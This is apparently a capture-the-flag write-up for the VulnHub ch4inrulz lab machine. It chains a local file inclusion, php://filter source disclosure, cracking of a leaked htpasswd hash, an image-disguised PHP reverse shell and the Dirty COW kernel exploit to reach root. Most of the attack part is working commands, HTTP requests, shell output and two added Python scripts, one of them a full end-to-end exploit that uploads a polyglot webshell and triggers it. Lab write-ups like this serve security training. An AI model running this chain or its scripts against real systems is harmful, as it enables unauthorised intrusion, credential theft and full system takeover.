Target: https://www.vulnhub.com/entry/ch4inrulz-101,247/
1. Information gathering
Host discovery
arp-scan
10.10.10.167 00:0c:29:c5:a1:1a VMware, Inc.
Port scan
sudo nmap -Pn -O -sV 10.10.10.167
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
8011/tcp open http Apache httpd 2.2.22 ((Ubuntu))
OS details: Linux 2.6.19 - 2.6.36
Directory scan
dirb http://10.10.10.167/
---- Scanning URL: http://10.10.10.167/ ----
+ http://10.10.10.167/cgi-bin/ (CODE:403|SIZE:288) Apache/2.2.22 (Ubuntu) Server at 10.10.10.167 Port 80
==> DIRECTORY: http://10.10.10.167/css/
+ http://10.10.10.167/development (CODE:401| SIZE:479)
==> DIRECTORY: http://10.10.10.167/img/
+ http://10.10.10.167/index (CODE:200|SIZE:334)
+ http://10.10.10.167/index.html (CODE:200|SIZE:13516)
==> DIRECTORY: http://10.10.10.167/js/
+ http://10.10.10.167/LICENSE (CODE:200|SIZE:1093)
+ http://10.10.10.167/robots (CODE:200|SIZE:21)
+ http://10.10.10.167/robots.txt (CODE:200|SIZE:21)
+ http://10.10.10.167/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://10.10.10.167/vendor/
dirb http://10.10.10.167:8011/
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.167:8011/ ----
==> DIRECTORY: http://10.10.10.167:8011/api/
+ http://10.10.10.167:8011/index.html (CODE:200|SIZE:30)
+ http://10.10.10.167:8011/server-status (CODE:403|SIZE:295)
---- Entering directory: http://10.10.10.167:8011/api/ ----
+ http://10.10.10.167:8011/api/index.html (CODE:200|SIZE:351)
A quick look at each:
- http://10.10.10.167/index: frank's personal homepage
- http://10.10.10.167/development (CODE:401|SIZE:479): HTTP Basic auth prompt
- http://10.10.10.167/vendor/: directory listing is enabled; the same goes for /img and /js
- http://10.10.10.167:8011: "under development"
- http://10.10.10.167:8011/api/: lists a few PHP endpoints still in development:
  - web_api.php, database_api.php, records_api.php all return 404
  - files_api.php: responds that it needs a file parameter
In Burp, use "Change request method" to send a POST to http://10.10.10.167:8011/api/files_api.php with file=/etc/passwd; the contents of /etc/passwd are echoed back. Note the frank user:
frank:x:1000:1000:frank,,,:/home/frank:/bin/bash
Nothing else of interest at this point.
Developers like to leave backup files around, so scan again for the .bak extension:
$ dirb http://10.10.10.167/ -X .bak
---- Scanning URL: http://10.10.10.167/ ----
+ http://10.10.10.167/index.html.bak (CODE:200|SIZE:334)
Fetch it:
$ curl http://10.10.10.167/index.html.bak
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<a href="/development">development</a>
<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
</body></html>
Save the hash in htpasswd format (the full $apr1$ string from the comment; the $apr1$1 prefix is part of the hash and must not be dropped):
frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
Crack it with john; --show prints the cracked entry:
$ john ./frank_pwd.txt --show
frank:frank!!!
1 password hash cracked, 0 left
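The leaked hash is Apache's $apr1$ htpasswd format, which is the md5crypt construction with the magic string "$apr1$". As an added check that is not part of the original write-up, the following Python reimplements that algorithm (following Apache's apr_md5_encode()) so the cracked password can be verified against the leaked hash without john. The hash line and the candidate password frank!!! come from the page; the function names and the standard-library-only implementation are my own.

```python
"""Verify an Apache htpasswd $apr1$ hash in pure Python (added example).

$apr1$ is the md5crypt construction with the magic "$apr1$"; the steps
below follow Apache's apr_md5_encode()."""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"


def _to64(value: int, count: int) -> str:
    """md5crypt's custom base64: 6 bits at a time, least significant first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_hash(password: str, salt: str) -> str:
    pw = password.encode()
    salt_b = salt.encode()[:8]  # apr1 uses at most 8 salt characters
    # Initial context: password, magic, salt.
    ctx = hashlib.md5(pw + MAGIC + salt_b)
    # Alternate sum md5(password + salt + password), mixed in once per 16 bytes of password.
    alt = hashlib.md5(pw + salt_b + pw).digest()
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    # For each bit of the password length: a NUL byte if the bit is set, else the first password byte.
    bits = len(pw)
    while bits:
        ctx.update(b"\x00" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    # 1000 rounds of stretching with md5crypt's fixed mixing schedule.
    for i in range(1000):
        round_ctx = hashlib.md5()
        round_ctx.update(pw if i & 1 else final)
        if i % 3:
            round_ctx.update(salt_b)
        if i % 7:
            round_ctx.update(pw)
        round_ctx.update(final if i & 1 else pw)
        final = round_ctx.digest()
    # Interleaved encoding of the 16 digest bytes into 22 characters.
    f = final
    encoded = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return f"$apr1${salt_b.decode()}${encoded}"


def verify_apr1(password: str, stored: str) -> bool:
    """Check a candidate password against a stored $apr1$salt$hash string."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError("not an $apr1$ hash")
    return hmac.compare_digest(apr1_hash(password, parts[2]), stored)


def parse_htpasswd_line(line: str) -> tuple:
    """Split a 'user:hash' htpasswd line such as the one leaked in index.html.bak."""
    user, _, digest = line.strip().partition(":")
    return user, digest


# The hash line leaked in the index.html.bak comment (from the write-up).
LEAKED_LINE = "frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0"

if __name__ == "__main__":
    user, digest = parse_htpasswd_line(LEAKED_LINE)
    print(user, verify_apr1("frank!!!", digest))  # True if john's result is right
```

The same routine doubles as a tiny offline cracker for a short wordlist: loop verify_apr1 over candidates. It is slow in pure Python (1000 MD5 rounds per guess), which is exactly why john or hashcat is the right tool for anything beyond a sanity check.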
2. Exploitation
ftp/ssh
FTP logins can be brute-forced with msf, but that did not succeed earlier. Log in directly as anonymous:
$ ftp 10.10.10.167
Connected to 10.10.10.167.
220 (vsFTPd 2.3.5)
Name (10.10.10.167:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /var/www
550 Failed to change directory.
Anonymous login works, but poking around turns up nothing useful. SSH does not let us in either.
http
Logging in to http://10.10.10.167/development with the cracked credentials works; the page hints:
* Here is my unfinished tools list
- the uploader tool (finished but need security review)
That points to another URL, http://10.10.10.167/development/uploader/, which lets you upload images:
File is an image - image/png.The file 1.png has been uploaded to my uploads path.
Uploading a plain PHP file is rejected:
File is not an image.Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded.
Before uploading an image-disguised webshell, take stock. We already know http://10.10.10.167:8011/api/files_api.php has a local file inclusion (LFI) bug; what we still need is the path where uploaded images land. The upload form:
<form action="upload.php" method="post" enctype="multipart/form-data">
<p>Select image to upload:</p>
<p><input type="file" name="fileToUpload" id="fileToUpload"></p>
<p><input type="submit" value="Upload Image" name="submit"></p>
</form>
A reasonable guess is that the upload handler lives at /var/www/development/uploader/upload.php; try to pull it through the LFI:
POST /api/files_api.php HTTP/1.1
...
file=/var/www/development/uploader/upload.php
Instead of returning the source, the include executes the PHP:
Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded.
So wrap the path in the php://filter stream wrapper to get the source base64-encoded rather than executed:
POST /api/files_api.php HTTP/1.1
...
file=php://filter/read=convert.base64-encode/resource=/var/www/development/uploader/upload.php
The response is the base64 of upload.php; decode it with Burp's Decoder:
<?php
$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
        $uploadOk = 1;
    } else {
        echo "File is not an image.";
        $uploadOk = 0;
    }
}
// Check if file already exists
if (file_exists($target_file)) {
    echo "Sorry, file already exists.";
    $uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large.";
    $uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
    $uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?>
Uploads are therefore stored under /development/uploader/FRANKuploads/. The only content check is getimagesize(), which inspects the file header, and the extension check is a plain whitelist, so an image header in front of PHP code passes both.
Take Kali's PHP reverse shell, /usr/share/webshells/php/php-reverse-shell.php, set its $ip to the attacker address and $port to 1234, prepend the GIF magic bytes GIF89a so getimagesize() accepts it as an image, and rename it frank.gif. Once it uploads, start a listener: nc -lvvp 1234.
Then include the "image" through the LFI, which executes the PHP inside it:
POST /api/files_api.php HTTP/1.1
...
file=/var/www/development/uploader/FRANKuploads/frank.gif
The reverse shell comes back:
$ nc -lvvp 1234
listening on [any] 1234 ...
connect to [10.10.10.160] from 10.10.10.167 [10.10.10.167] 45104
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
09:09:22 up 2:08, 0 users, load average: 0.05, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/$ uname -a
uname -a
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
www-data@ubuntu:/$
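The whole chain just walked through (read upload.php via php://filter, build a GIF/PHP polyglot that passes getimagesize(), upload it behind the Basic-auth prompt, then include it through files_api.php) as one script. This is an added example, not code from the original write-up: the URLs, the FRANKuploads path and the frank / frank!!! credentials come from the page, while the payload file path, the 1x1 GIF header, the hand-rolled multipart body and the getimagesize() approximation are my own assumptions. The helpers at the top run offline; main() talks to the target.

```python
"""LFI -> source disclosure -> GIF/PHP polyglot upload -> include (added example).

Assumes pentestmonkey's php-reverse-shell.php with $ip/$port already edited
as the payload, and nc -lvvp 1234 already listening on the attacker box."""
import base64
import struct
import urllib.parse
import urllib.request
import uuid

API = "http://10.10.10.167:8011/api/files_api.php"
UPLOADER = "http://10.10.10.167/development/uploader/upload.php"
UPLOAD_PHP = "/var/www/development/uploader/upload.php"
UPLOAD_DIR = "/var/www/development/uploader/FRANKuploads/"
# /development is protected by the .htpasswd whose hash leaked in index.html.bak.
BASIC_AUTH = "Basic " + base64.b64encode(b"frank:frank!!!").decode()


def php_filter_b64(path: str) -> str:
    """Wrapper that makes include() return a file's source as base64 instead of executing it."""
    return "php://filter/read=convert.base64-encode/resource=" + path


def decode_filtered_source(body: str) -> str:
    """Decode the base64 body the filter wrapper produces."""
    return base64.b64decode(body.strip()).decode("utf-8", "replace")


def make_gif_polyglot(php_code: bytes) -> bytes:
    """Prepend a GIF89a signature plus a 1x1 logical screen descriptor (assumed header).
    getimagesize() only reads these header bytes, so the file is reported as image/gif
    while include() still executes the PHP that follows."""
    header = b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x00\x00\x00"
    return header + php_code


def getimagesize_gif(blob: bytes):
    """Approximation of PHP's getimagesize() for GIF: check the 3-byte 'GIF' signature,
    then read width/height from the bytes after the 6-byte version string. Nothing
    else is validated, which is why the polyglot passes."""
    if len(blob) < 11 or blob[:3] != b"GIF":
        return None
    width, height = struct.unpack_from("<HH", blob, 6)
    return {"width": width, "height": height, "mime": "image/gif"}


def build_multipart(field: str, filename: str, content: bytes, mime: str, fields: dict):
    """Hand-rolled multipart/form-data body matching the uploader's form
    (fileToUpload + submit). Returns (body, Content-Type header value)."""
    boundary = "----" + uuid.uuid4().hex
    body = bytearray()
    for name, value in fields.items():
        body += f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode()
    body += (f'--{boundary}\r\nContent-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
             f"Content-Type: {mime}\r\n\r\n").encode()
    body += content + b"\r\n"
    body += f"--{boundary}--\r\n".encode()
    return bytes(body), f"multipart/form-data; boundary={boundary}"


def lfi_post(path: str, timeout: float = 10) -> str:
    """POST file=<path> to files_api.php, as done in Burp in the write-up."""
    data = urllib.parse.urlencode({"file": path}).encode()
    with urllib.request.urlopen(API, data=data, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def main(payload_path: str = "/usr/share/webshells/php/php-reverse-shell.php",
         name: str = "frank.gif") -> None:
    # 1. Read the upload handler's source instead of executing it.
    print(decode_filtered_source(lfi_post(php_filter_b64(UPLOAD_PHP))))
    # 2. Build the polyglot and confirm it would satisfy the server-side image check.
    with open(payload_path, "rb") as fh:
        blob = make_gif_polyglot(fh.read())
    assert getimagesize_gif(blob) is not None
    body, ctype = build_multipart("fileToUpload", name, blob, "image/gif", {"submit": "Upload Image"})
    req = urllib.request.Request(UPLOADER, data=body, method="POST",
                                 headers={"Content-Type": ctype, "Authorization": BASIC_AUTH})
    with urllib.request.urlopen(req, timeout=10) as resp:
        print(resp.read().decode("utf-8", "replace"))
    # 3. Include the uploaded file. The request hangs while the shell is alive,
    #    so a timeout here is the expected sign of success.
    try:
        lfi_post(UPLOAD_DIR + name, timeout=5)
    except Exception as exc:
        print("include sent:", exc)


if __name__ == "__main__":
    main()
```

The fix on the server side follows from getimagesize_gif(): header sniffing is not content validation. A handler that re-encodes the upload with an image library, stores it outside the web root under a server-generated name, and never lets a path from the client reach include() removes both halves of this chain.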
We are www-data; the next step is privilege escalation.
Privilege escalation
Use Dirty COW (CVE-2016-5195). searchsploit dirty finds the PoCs bundled with Kali; the one used here is the /etc/passwd variant (the "firefart" PoC), whose exploit-db entry is titled "Linux Kernel 2.6.22 < 3.9".
The bug itself is present in kernels from 2.6.22 until the October 2016 fixes, so the target's 2.6.35 kernel is well inside the affected range.
Transfer the source to the target. Receive on the target:
www-data@ubuntu:/tmp$ nc -l 1234 > dirty.c
Send from the attacker:
$ nc 10.10.10.167 1234 < dirty.c
Alternatively, serve it with python -m SimpleHTTPServer on the attacker and fetch it with wget on the target.
Compile on the target:
www-data@ubuntu:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@ubuntu:/tmp$ ls
ls
VMwareDnD _cafenv-appconfig_ dirty dirty.c vmware-root
www-data@ubuntu:/tmp$ ./dirty newuserpassword
./dirty newuserpassword
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: newuserpassword
Complete line:
firefart:fiepnnSO6fvZA:0:0:pwned:/root:/bin/bash
The exploit has overwritten the root entry in /etc/passwd with a uid 0 user named firefart (the original file is backed up to /tmp/passwd.bak). Switch to it:
www-data@ubuntu:/tmp$ su firefart
su firefart
Password: newuserpassword
firefart@ubuntu:/tmp# whoami
whoami
firefart
firefart@ubuntu:/tmp# id
id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@ubuntu:/tmp# cd ~
cd ~
firefart@ubuntu:~# ls
ls
root.txt
firefart@ubuntu:~# cat roo
cat root.txt
8f420533b79076cc99e9f95a1a4e5568
firefart@ubuntu:~# cat root.txt
cat root.txt
8f420533b79076cc99e9f95a1a4e5568
firefart@ubuntu:~#
You can also log in over SSH with ssh firefart@10.10.10.167.
When done, restore /etc/passwd from /tmp/passwd.bak (the exploit replaced the root entry) and clean up your traces.